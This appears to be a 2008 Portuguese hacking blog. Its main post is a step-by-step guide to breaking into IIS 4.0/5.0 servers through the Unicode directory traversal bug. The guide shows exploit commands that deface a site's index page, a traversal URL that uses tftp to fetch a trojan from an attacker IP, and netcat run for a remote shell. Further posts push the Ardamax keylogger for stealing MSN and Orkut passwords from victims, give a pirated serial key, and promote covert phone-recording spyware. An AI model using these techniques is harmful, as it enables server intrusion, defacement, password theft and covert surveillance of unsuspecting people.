terça-feira, 1 de janeiro de 2008

Omatic

esse programa te possibilita a injeção de numeros em jogos

ele modifica numeros em jogos como por exemplo dinheiro life Hp Sp etc.....

o mais incrivel ele funciona em alguns jogos online..... como por exemplo The Duel....


download

Dicas para invadir servidores

Todas as dicas contidas nesta
área são totalmente de sua responsabilidade, estão aqui apenas com o intuito de
trazer as informações para que vocês internautas tenham um conhecimento além do
normal e saiba como se defender na internet, portanto eu não me responsabilizo
por qualquer ato imbecil que você venha a fazer com as informações aqui
contidas.




Tentaremos aqui desenvolver um paper explicando
passo-à-passo de como um "hacker" faz para obter acesso num servidor rodando
WindowsNT Microsoft IIS 4.0 / 5.0 Extended UNICODE Directory Traversal
vulnerável e como corrigir essa vulnerabilidade.


Obs: esta
técnica já é bem
velhinha



Segue abaixo as versões dos
Sistemas Operacionais e Programas Vulneráveis.


::Vulnerável:

::Microsoft IIS 5.0

+Microsoft Windows NT 2000

::Microsoft IIS 4.0

- Microsoft Windows NT 4.0

+Microsoft BackOffice 4.5

- Microsoft Windows NT 4.0

+Microsoft BackOffice 4.0


- Microsoft Windows NT 4.0


Vamos ao que interessa



INDICE


1º Procurar por um host vulnerável.

2º Testar se o host é realmente vulnerável.

2.1 Fazer um scanner no host alvo.

2.2 Testar o exploit no host alvo antes mesmo de verificar se ele está
vulnerável ou não.

3º Listar os arquivos e pastas contidos no servidor vulnerável.


4º Alterar o conteúdo do site do host vulnerável.

5º TÉCNICAS DE HAXORS. ;-)

6º AGORA VOCÊ É UM HACKER. OU NÃO?

7º MAIS EXPLOITS.

8º CORREÇÃO.



1º) Procurar por um host
vulnerável


Geralmente os hosts mais
procurados são os mais conhecidos, como sites do governo e empresas
nacionalmente e mundialmente conhecidas. Mas se você quer dar uma de "hacker"
pegue uma hp bem fulerinha..


2º) Testar se o host é
realmente vulnerável.



Existem duas maneiras básicas.


2.1 Fazer um scanner no host
alvo.



Existem scanners que vasculham
servidores e serviços que estão sendo executados. Esses scanners verificam se há
algum serviço vulnerável, que ainda não foi corrigido. Para testar essa
vulnerabilidade existem scanners tanto para windows quanto pra linux.

Para windows você pode obter o

SSS - Security Shadow
Scanner (já vem com seu crack dentro do .zip)

Para linux um scanner feito perl que quando encontra um HOST vulnerável ele
inidica o url de onde pode-se obter o exploit para explorar essa
vulnerabilidade.



Segue abaixo como usá-los:


- SSS (Security Shadow Scanner)
Não há mistério de como utilizá-lo. Basta preencher o campo com o IP ou HOST do
alvo e iniciar o "scanneamento". Quando encontrar ele colocará em vermelho um
aviso dizendo que o HOST está vulnerável ao msdac.dll.



- unicheck.pl - Veja o que
acontece quando ele acha um HOST vulnerável.

perl unicheck.pl XXX.XXX.XXX.XXX:80

- Pode ver que ele avisa que o host é vulnerável. THIS HOST IS VULNERABLE :-).

Avisa onde encotrar o exploit para explorar a vulnerabilidade.
http://packetstorm.securify.com/0010-exploits/unicodexecute2.pl



2.2 Testar o exploit no host alvo
antes mesmo de verificar se ele está vulnerável ou não..


Agora iremos testar o exploit no
nosso host alvo.

"dir c:inetpub"



Como pode ver acima, foi listado os diretórios dentro do diretório c:inetpub.
Assim o "hacker" tem acesso à todo o seus arquivos, podendo assim alterar o site
da empresa que infelizmente não tem uma equipe separada da equipe de
administração responsável pela segurança da empresa, que não só se limita à
segurança virtual. Como o "hacker" pode ler o diretório "c:inetpub" ele também
pode ter acesso ao diretório padrão do website "c:inetpubwwwroot" ou outro
diretório que hospeda os arquivos do site da empresa como pode ver abaixo.


3º) Listar os arquivos e pastas
contidos no servidor vulnerável.


Iremos listar todos os arquivos e
diretórios dentro de uma determinada pasta.>

perl xpu.pl www.host-alvo.com.br:80 "dir c:inetpubwwwroot"


4º) Alterar o conteúdo do site
do host vulnerável.



perl unicodexecute.pl www.host-alvo.com.br:80
''echo SITE HACKED BY Remote Menace!! > c:\inetpubwwwroot\index.htm''

Pronto... agora você alterou o site da empresa que encontrou vulnerável. Quando
for acessar o site da empresa que encontrou vulnerável você encontrará a
seguinte mensagem no site:

" SITE HACKED BY Remote Menace! "

É assim que praticamente o mundo inteiro está sendo invadido. :-)


5º) TÉCNICAS DE HAXORS


Bom..

. agora varia de pessoa para pessoa, conheceimento para conhecimento,
criatividade para criatividade. O jeito de como você pode obter maiores
informações a partir da exploração da vulnerabilidade do unicode só dependerá de
você.




Para adiantar o seu lado, vamos adiantar alguma coisa. Com o acesso já garantido
ao servidor você poderá fazer o que bem entende. Geralmente os "hackers" do
Brasil se contentam em alterar a pagina e esquecer de "backdoorizar" as máquinas
que eles conseguem invadir. De certa forma isso é muito bom, pois o que parece é
que eles querem somente manifestar o seu descontentamento com o governo e a
administração que o Brasil tem. Não que isso seja certo ou que concordamos com o
que eles fazem. Infelizmente as pessoas ainda não tem conhecimento do que
acontece e o que realmente é o underground e mesmo o que é um HACKER no sentido
profundo.



Para você obter um maior acesso à
rede, ou seja, conseguir acesso à outras máquinas, outros tipos de acessos,
abrir um terminal remoto e até mesmo continuar tendo acesso à máquina, você
precisa fazer algumas coisas, mesmo porque o servidor não ficará vulnerável para
sempre.



Você pode utilizar ferramentas que já vem instaladas por default (padrão) no
Windows NT e 2000 para "facilitar" a sua vida. A dica que daremos aqui é
utilizar o TFTP para poder abrir um terminal remoto posteriormente e continuar
tendo acesso à máquina mesmo depois de sua correção.


/[bin-dir]/..%c0%af../winnt/system32/tftp.exe+"-i"

+ip.de.onde.esta.o.trojan+GET+trojan.exe+c:\winnt\system32\trojan.exe

.

agora rode o trojan com:


/[bin-dir]/..%c0%af../winnt/system32/ncx99.exe



Bom...

Agora você instalou o nc no servidor, poderá abrir um terminal remoto no Windows
NT, tendo acesso completo ao sistema.



Como foi dito antes, depende de você continuar tendo acesso ao servidor. E essas
técnicas estão sendo aprimoradas a cada dia. Você acha que pode conseguir ter
acesso ao arquivo SAM? Você pode descriptografar as senhas dos usuários? Você
pode utilizar o terminal que você abriu e tentar ter acesso à outras máquinas
para não haver um reastreamento direto para sua máquina?Você pode conseguir
acesso à rede interna (10.0.0.0 por exemplo) se houver? Você pode sniffar a rede
a partir dessa máquina e obter acesso às outras máquinas?



Como pode ver... pode se fazer MUITA coisa além de modificar uma página apartir
de um bug que CENTENAS de servidores ainda continuam vulneráveis por todo o
mundo.


6º) AGORA VOCÊ É UM HACKER. OU
NÃO?



Você se considera um hacker?


Bom...


7º) MAIS EXPLOITS.


Mais exploits:





iis-zang.c



iis-zang.exe




iis-zang.obsd



iis-zang.linux



unicodecheck.pl



unicodexecute.pl




unicodexecute2.pl





8º) CORREÇÃO.



Contratar um Security Officer
para cuidar da segurança da sua empresa.

Se manter o mais atualizado possível.



Internet Informatio Server 4.0




http://www.microsoft.com/ntserver/nts/downloads/



Internet Informatio Server 5.0



http://www.microsoft.com/ntserver/nts/downloads/

Pegando IP 4 maneiras

Bom é muito simples e pratico da para se pegar um ip

ai vão algumas formas simples.

PELO MSN MESSENGER:

-Para pegar ip dos seus contatos no MSN você precisa
ter uma conexão direta com a vítima,
por exemplo, mande um arquivo pra vítima,
e na hora da transferência você abre o DOS e digita NETSTAT -N,
aí vai aparecer uma lista de ips,
o da vítima será o último da lista..

Outro metodo pelo MSN é um plugins... esse plugins é responsavel pelo agendamento dos ip's dos seus amigos.. facil de configurar... melhor nem presisa configurar é só instala e pronto. Lembrando que Você presisa do plugins do msn..aquele que todo mundo usa. O nome do plugins responsavel pelo agendamento dos ip's é ipGet.

PEGAR IPs em salas de chat

Bom existe o comando ARP -A ele dá o IP de qualquer computador que vc esteja se comunicando primeiro vc escolhe o LAMMER...daí vc nem fala mais com ninguém só com ele...
pq senão vai aparecer o IP duma galera e vc vai ficar bem embolado sem saber de quem são os IP'S
depois de escolhido o lammer vá ao prompt do MS-DOS e digite:
ARP -A
Vai aparecer umas parada assim....

Interface: aqui_vai_aparecer_o_teu_ip

Internet Address Physical Adress Type

Aqui_vai_aparesser_o_ip_do_cara
Endereço_physical Aqui o tipo do IP dinâmico ou fixo...


PEGAR IPs ATRAVES DE EMAILs

è possivel pegar diversas informações em um e-mail, e alterando pequenas informações no hotmail é possivel pegar o ip de otra pessoa entre otras informações

Primeiramente clike em "OPÇÔES" no canto superior direito da pagina inicial de sua conta do hotmail.
Logo apos clike em "CORREIO" logo apos em "CONFIGURAÇÃO DE EXIBIÇÃO DE MENSAGENS".
O proximo passo é localizar "CABEÇALHO DE MENSAGENS" em seguida, marque a opção "AVANÇADA". logo apos clike em "OK"

pronto e a cada e-mail ke vc receber procure pela palavra "X-originating-IP:xxx.xxx.xxx.xxx"

Bom divertimento!!

Ardamax Keylogger




Utilidade que permite capturar todas teclas digitadas e registrar logs completos sobre as mesmas.
Esta ferramenta pode descobrir o que pessoas digitam em seu computador quando você não está por perto, mantendo dados e logs.
Ele registra a data e hora de cada digitação.


Muito bom para capturar senhas de msn e orkut!!

Se configura tdo certinho e manda o keylogger pra pessoa...e elea executa JAh era!


Ardamax Keylogger 2.8.

download

Vacina ( se vc foi infectado)

download

Video Aula http://www.youtube.com/watch?v=TDZ8N7yXQYg

Enviando ardamax por link http://www.youtube.com/watch?v=6bpvkjxPZDQ

Serial

Name: Invasão

Key: XTPFVPQINFMUMUM

Modem Spy v3.61




Modem Spy é um espião completo para usuários que dispõem de modem de áudio conectado a linha telefônica.

As opções que nos oferece são múltiplas, como por exemplo:

• Grava conversas telefônicas automaticamente
• Grava mensagens desde um microfone ou um ditafone
• Reproduz mensagens gravadas de uma linha ou viva voz
• Detecta e notifica Caller ID
• Secretária Eletrônica
• Envio de correio eletrônico automático com as gravações
• Notificação remota antes de gravar
• Converte as gravações a MP3, WAV, etc.
• Histórico com anotações sobre cada gravação
• Controle automático incorporado

A interface é muito intuitiva e clara, tendo todas as opções rapidamente acessíveis .


download

SupercamBR 6.37




Assista canais de televisão em seu computador


Impressionante sintonizador de televisão e rádio que vem pré-configurado com emissoras do Brasil, e se atualiza automaticamente


download

SupercamBR 8.20




Assista TVs e Webcams, ouça rádios online. SupercamBR possui atualização automática, diversos canais pré-configurados e permite que se acrescente outros.

DOWNLOAD

Pacote de Canais que inclui todos os canais do TV Pack Basic e os do TV Pack Adult de programação

DOWNLOAD